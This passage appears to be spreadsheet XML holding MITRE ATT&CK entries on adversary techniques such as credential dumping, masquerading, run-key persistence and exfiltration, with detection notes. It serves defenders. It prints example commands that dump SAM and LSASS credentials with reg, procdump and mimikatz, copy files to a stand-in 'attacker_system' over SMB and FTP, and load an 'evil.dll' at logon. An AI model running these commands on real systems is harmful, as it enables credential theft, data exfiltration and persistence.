To obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path &lt;code&gt;/proc/&lt;pid&gt;/maps&lt;/code&gt;, where the &lt;code&gt;&lt;pid&gt;&lt;/code&gt; directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.</t>
  </si>
  <si>
    <t>Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Several of the tools mentioned in this technique may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.
### Windows
#### SAM (Security Accounts Manager)
The SAM is a database file that contains local accounts for the host, typically those found with the ‘net user’ command. To enumerate the SAM database, system level access is required.
A number of tools can be used to retrieve the SAM file through in-memory techniques:
* pwdumpx.exe 
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
Alternatively, the SAM can be extracted from the Registry with [Reg](https://attack.mitre.org/software/S0075):
* &lt;code&gt;reg save HKLM\sam sam&lt;/code&gt;
* &lt;code&gt;reg save HKLM\system system&lt;/code&gt;
Creddump7 can then be used to process the SAM database locally to retrieve hashes. (Citation: GitHub Creddump7)
Notes:
Rid 500 account is the local, in-built administrator.
Rid 501 is the guest account.
User accounts start with a RID of 1,000+.
#### Cached Credentials
The DCC2 (Domain Cached Credentials version 2) hash, used by Windows Vista and newer caches credentials when the domain controller is unavailable. The number of default cached credentials varies, and this number can be altered per system. This hash does not allow pass-the-hash style attacks.
A number of tools can be used to retrieve the SAM file through in-memory techniques.
* pwdumpx.exe 
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.
Notes:
Cached credentials for Windows Vista are derived using PBKDF2.
#### Local Security Authority (LSA) Secrets
With SYSTEM access to a host, the LSA secrets often allows trivial access from a local account to domain-based account credentials. The Registry is used to store the LSA secrets.
When services are run under the context of local or domain users, their passwords are stored in the Registry. If auto-logon is enabled, this information will be stored in the Registry as well.
A number of tools can be used to retrieve the SAM file through in-memory techniques.
* pwdumpx.exe 
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.
Notes:
The passwords extracted by his mechanism are UTF-16 encoded, which means that they are returned in plaintext.
Windows 10 adds protections for LSA Secrets described in Mitigation.
#### NTDS from Domain Controller
Active Directory stores information about members of the domain including devices and users to verify credentials and define access rights. The Active Directory domain database is stored in the NTDS.dit file. By default the NTDS file will be located in %SystemRoot%\NTDS\Ntds.dit of a domain controller. (Citation: Wikipedia Active Directory)
The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
* Volume Shadow Copy
* secretsdump.py
* Using the in-built Windows tool, ntdsutil.exe
* Invoke-NinjaCopy
#### Group Policy Preference (GPP) Files
Group Policy Preferences (GPP) are tools that allowed administrators to create domain policies with embedded credentials. These policies, amongst other things, allow administrators to set local accounts.
These group policies are stored in SYSVOL on a domain controller, this means that any domain user can view the SYSVOL share and decrypt the password (the AES private key was leaked on-line. (Citation: Microsoft GPP Key) (Citation: SRD GPP)
The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:
* Metasploit’s post exploitation module: "post/windows/gather/credentials/gpp"
* Get-GPPPassword (Citation: Obscuresecurity Get-GPPPassword)
* gpprefdecrypt.py
Notes:
On the SYSVOL share, the following can be used to enumerate potential XML files.
dir /s * .xml
#### Service Principal Names (SPNs)
See [Kerberoasting](https://attack.mitre.org/techniques/T1208).
#### Plaintext Credentials
After a user logs on to a system, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service (LSASS) process in memory. These credentials can be harvested by a administrative user or SYSTEM.
SSPI (Security Support Provider Interface) functions as a common interface to several Security Support Providers (SSPs): A Security Support Provider is a dynamic-link library (DLL) that makes one or more security packages available to applications.
The following SSPs can be used to access credentials:
Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges. (Citation: TechNet Blogs Credential Protection)
Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services. (Citation: Microsoft CredSSP)
The following tools can be used to enumerate credentials:
* [Windows Credential Editor](https://attack.mitre.org/software/S0005)
* [Mimikatz](https://attack.mitre.org/software/S0002)
As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
For example, on the target host use procdump:
* &lt;code&gt;procdump -ma lsass.exe lsass_dump&lt;/code&gt;
Locally, mimikatz can be run:
* &lt;code&gt;sekurlsa::Minidump lsassdump.dmp&lt;/code&gt;
* &lt;code&gt;sekurlsa::logonPasswords&lt;/code&gt;
#### DCSync
DCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller's  application programming interface (API) (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller. Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data (Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1097) (Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098). (Citation: InsiderThreat ChangeNTLM July 2017) DCSync functionality has been included in the "lsadump" module in Mimikatz. (Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol. (Citation: Microsoft NRPC Dec 2017)
### Linux
#### Proc filesystem
The /proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively. This functionality has been implemented in the [MimiPenguin](https://attack.mitre.org/software/S0179), an open source tool inspired by [Mimikatz](https://attack.mitre.org/software/S0002). The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,GCP,AWS,Azure</t>
  </si>
  <si>
    <t xml:space="preserve">Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration.
Adversaries will often search the file system on computers they have compromised to find files of interest. They may do this using a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
</t>
  </si>
  <si>
    <t>File monitoring,File system access controls</t>
  </si>
  <si>
    <t>Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using [Tasklist](https://attack.mitre.org/software/S0057), and "net start" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well. Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries can use binary padding to add junk data and change the on-disk representation of malware without affecting the functionality or behavior of the binary. This will often increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.
Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blacklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ)
</t>
  </si>
  <si>
    <t>Signature-based detection,Anti-virus</t>
  </si>
  <si>
    <t>Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
The Registry contains a significant amount of information about the operating system, configuration, software, and security. (Citation: Wikipedia Windows Registry)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t>
  </si>
  <si>
    <t>A port monitor can be set through the  (Citation: AddMonitor) API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in &lt;code&gt;C:\Windows\System32&lt;/code&gt; and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;. 
The Registry key contains entries for the following:
* Local Port
* Standard TCP/IP Port
* USB Monitor
* WSD Port
Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.</t>
  </si>
  <si>
    <t>File monitoring,Host intrusion prevention systems,Process whitelisting,Signature-based detection,System access controls,Whitelisting by file name or path,Anti-virus</t>
  </si>
  <si>
    <t>Adversaries will likely look for details about the network configuration and settings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
Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,GCP,Azure,AWS</t>
  </si>
  <si>
    <t xml:space="preserve">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related to legitimate remote system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 </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries will likely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Adversaries may also use local host files in order to discover the hostname to IP address mappings of remote systems. 
### Windows
Examples of tools and commands that acquire this information include "ping" or "net view" using [Net](https://attack.mitre.org/software/S0039). The contents of the &lt;code&gt;C:\Windows\System32\Drivers\etc\hosts&lt;/code&gt; file can be viewed to gain insight into the existing hostname to IP mappings on the system.
### Mac
Specific to Mac, the &lt;code&gt;bonjour&lt;/code&gt; protocol to discover additional Mac-based systems within the same broadcast domain. Utilities such as "ping" and others can be used to gather information about remote systems. The contents of the &lt;code&gt;/etc/hosts&lt;/code&gt; file can be viewed to gain insight into existing hostname to IP mappings on the system.
### Linux
Utilities such as "ping" and others can be used to gather information about remote systems. The contents of the &lt;code&gt;/etc/hosts&lt;/code&gt; file can be viewed to gain insight into existing hostname to IP mappings on the system.
### Cloud
In cloud environments, the above techniques may be used to discover remote systems depending upon the host operating system. In addition, cloud environments often provide APIs with information about remote systems and services.
</t>
  </si>
  <si>
    <t>Host forensic analysis,Signature-based detection,Host intrusion prevention systems,Application whitelisting,Process whitelisting,Log analysis,Whitelisting by file name or path</t>
  </si>
  <si>
    <t>Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior. Monitor processes created and actions taken by the WinRM process or a WinRM invoked script to correlate it with other related events. (Citation: Medium Detecting Lateral Movement)</t>
  </si>
  <si>
    <t>### Windows
Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using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 Mac
On Mac, the currently logged in user can be identified with &lt;code&gt;users&lt;/code&gt;,&lt;code&gt;w&lt;/code&gt;, and &lt;code&gt;who&lt;/code&gt;.
### Linux
On Linux, the currently logged in user can be identified with &lt;code&gt;w&lt;/code&gt; and &lt;code&gt;who&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Endgame Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)
For RTLO, detection methods should include looking for common formats of RTLO characters within filenames such as "\u202E", "[U+202E]", and "%E2%80%AE". Defenders should also check their analysis tools to ensure they do not interpret the RTLO character and instead print the true name of the a file containing it.</t>
  </si>
  <si>
    <t>Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.
One variant is for an executable to be placed in a commonly trusted directory or given the name of a legitimate, trusted program. Alternatively, the filename given may be a close approximation of legitimate programs or something innocuous. An example of this is when a common system utility or program is moved and renamed to avoid detection based on its usage.(Citation: FireEye APT10 Sept 2018) This is done to bypass tools that trust executables by relying on file name or path, as well as to deceive defenders and system administrators into thinking a file is benign by associating the name with something that is thought to be legitimate.
A third variant uses the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a Windows screensaver file named &lt;code&gt;March 25 \u202Excod.scr&lt;/code&gt; will display as &lt;code&gt;March 25 rcs.docx&lt;/code&gt;. A JavaScript file named &lt;code&gt;photo_high_re\u202Egnp.js&lt;/code&gt; will be displayed as &lt;code&gt;photo_high_resj.png&lt;/code&gt;. A common use of this technique is with spearphishing attachments since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default. 
Adversaries may modify a binary's metadata, including such fields as icons, version, name of the product, description, and copyright, to better blend in with the environment and increase chances of deceiving a security analyst or product.(Citation: Threatexpress MetaTwin 2017)
### Windows
In another variation of this technique, an adversary may use a renamed copy of a legitimate utility, such as rundll32.exe. (Citation: Endgame Masquerade Ball) An alternative case occurs when a legitimate utility is moved to a different directory and also renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)
An example of abuse of trusted locations in Windows would be the &lt;code&gt;C:\Windows\System32&lt;/code&gt; directory. Examples of trusted binary names that can be given to malicious binares include "explorer.exe" and "svchost.exe".
### Linux
Another variation of this technique includes malicious binaries changing the name of their running process to that of a trusted or benign process, after they have been launched as opposed to before. (Citation: Remaiten)
An example of abuse of trusted locations in Linux  would be the &lt;code&gt;/bin&lt;/code&gt; directory. Examples of trusted binary names that can be given to malicious binaries include "rsyncd" and "dbus-inotifier". (Citation: Fysbis Palo Alto Analysis)  (Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t>Whitelisting by file name or path</t>
  </si>
  <si>
    <t>Process whitelisting</t>
  </si>
  <si>
    <t>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
Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and Relay](https://attack.mitre.org/techniques/T1171), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.
Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (ex: IP addressing, hostnames, VLAN IDs) necessary for follow-on Lateral Movement and/or Defense Evasion activities.</t>
  </si>
  <si>
    <t>Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory.
Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.
Adversaries may use virtual machine software protection as a form of software packing to protect their code. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018)</t>
  </si>
  <si>
    <t>Signature-based detection,Anti-virus,Heuristic detection</t>
  </si>
  <si>
    <t>Linux,Windows,macOS,AWS,GCP,Azure</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system. 
Within cloud environments, adversaries may attempt to discover services running on other cloud hosts or cloud services enabled within the environment. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems.</t>
  </si>
  <si>
    <t xml:space="preserve">Data exfiltration is performed with a different protocol from the main command and control protocol or channel. The data is likely to be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different channels could include Internet Web services such as cloud storage.
Adversaries may leverage various operating system utilities to exfiltrate data over an alternative protocol. 
SMB command-line example:
* &lt;code&gt;net use \\\attacker_system\IPC$ /user:username password &amp;&amp; xcopy /S /H /C /Y C:\Users\\* \\\attacker_system\share_folder\&lt;/code&gt;
Anonymous FTP command-line example:(Citation: Palo Alto OilRig Oct 2016)
* &lt;code&gt;echo PUT C:\Path\to\file.txt | ftp -A attacker_system&lt;/code&gt;
</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,AWS,GCP,Azure</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. 
An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview)
### Windows
Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039).
### Mac and Linux 
In Mac and Linux, &lt;code&gt;netstat&lt;/code&gt; and &lt;code&gt;lsof&lt;/code&gt; can be used to list current connections. &lt;code&gt;who -a&lt;/code&gt; and &lt;code&gt;w&lt;/code&gt; can be used to show which users are currently logged in, similar to "net session".</t>
  </si>
  <si>
    <t>Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Monitor process execution from the &lt;code&gt;svchost.exe&lt;/code&gt; in Windows 10 and the Windows Task Scheduler &lt;code&gt;taskeng.exe&lt;/code&gt; for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in &lt;code&gt;%systemroot%\System32\Tasks&lt;/code&gt; for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)
* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered
* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated
* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted
* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created
* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled
* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns) Look for changes to tasks that do not correlate with known software, patch cycles, etc. Suspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data.
Monitor processes and command-line arguments for actions that could be taken to create tasks. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1086), so additional logging may need to be configured to gather the appropriate data.</t>
  </si>
  <si>
    <t>Utilities such as [at](https://attack.mitre.org/software/S0110) and [schtasks](https://attack.mitre.org/software/S0111), along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on. Scheduling a task on a remote system typically required being a member of the Administrators group on the remote system. (Citation: TechNet Task Scheduler Security)
An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.</t>
  </si>
  <si>
    <t xml:space="preserve">Detect lack of reported activity from a host sensor. Different methods of blocking may cause different disruptions in reporting. Systems may suddenly stop reporting all data or only certain kinds of data.
Depending on the types of host information collected, an analyst may be able to detect the event that triggered a process to stop or connection to be blocked. For example, Sysmon will log when its configuration state has changed (Event ID 16) and Windows Management Instrumentation (WMI) may be used to subscribe ETW providers that log any provider removal from a specific trace session. (Citation: Medium Event Tracing Tampering 2018) To detect changes in ETW you can also monitor the registry key which contains configurations for all ETW event providers: &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\AUTOLOGGER_NAME\{PROVIDER_GUID}&lt;/code&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1086) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).
ETW interruption can be achieved multiple ways, however most directly by defining conditions using the PowerShell Set-EtwTraceProvider cmdlet or by interfacing directly with the registry to make alterations.
In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products. </t>
  </si>
  <si>
    <t>Anti-virus,Log analysis,Host intrusion prevention systems</t>
  </si>
  <si>
    <t>Process whitelisting,Anti-virus</t>
  </si>
  <si>
    <t>Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
### Windows
An example command that would obtain details on processes is "tasklist" using the [Tasklist](https://attack.mitre.org/software/S0057) utility.
### Mac and Linux
In Mac and Linux, this is accomplished with the &lt;code&gt;ps&lt;/code&gt; command.</t>
  </si>
  <si>
    <t>Windows stores local service configuration information in the Registry under &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1086), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through Access Control Lists and permissions. (Citation: MSDN Registry Key Security)
If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, then adversaries can change the service binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).
Adversaries may also alter Registry keys associated with service failure parameters (such as &lt;code&gt;FailureCommand&lt;/code&gt;) that may be executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: TrustedSignal Service Failure)(Citation: Twitter Service Recovery Nov 2017)</t>
  </si>
  <si>
    <t>Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
The following run keys are created by default on Windows systems:
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce&lt;/code&gt;
The &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx&lt;/code&gt; is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: &lt;code&gt;reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"&lt;/code&gt; (Citation: Oddvar Moe RunOnceEx Mar 2018)
The following Registry keys can be used to set startup folder items for persistence:
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders&lt;/code&gt;
The following Registry keys can control automatic startup of services during boot:
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices&lt;/code&gt;
Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&lt;/code&gt;
The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit&lt;/code&gt; and &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell&lt;/code&gt; subkeys can automatically launch programs.
Programs listed in the load value of the registry key &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; run when any user logs on.
By default, the multistring BootExecute value of the registry key &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager&lt;/code&gt; is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.
Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.</t>
  </si>
  <si>
    <t>Detection of execution through the GUI will likely lead to significant false positives. Other factors should be considered to detect misuse of services that can lead to adversaries gaining access to systems through interactive remote sessions. 
Unknown or unusual process launches outside of normal behavior on a particular system occurring through remote interactive sessions are suspicious. Collect and audit security logs that may indicate access to and use of Legitimate Credentials to access remote systems within the network.</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1063) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
### Windows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 Mac
It's becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.</t>
  </si>
  <si>
    <t>Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and [PowerShell](https://attack.mitre.org/techniques/T1086) but could also be in the form of command-line batch scripts.
Scripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macros being allowed or that the user will accept to activate them.
Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)</t>
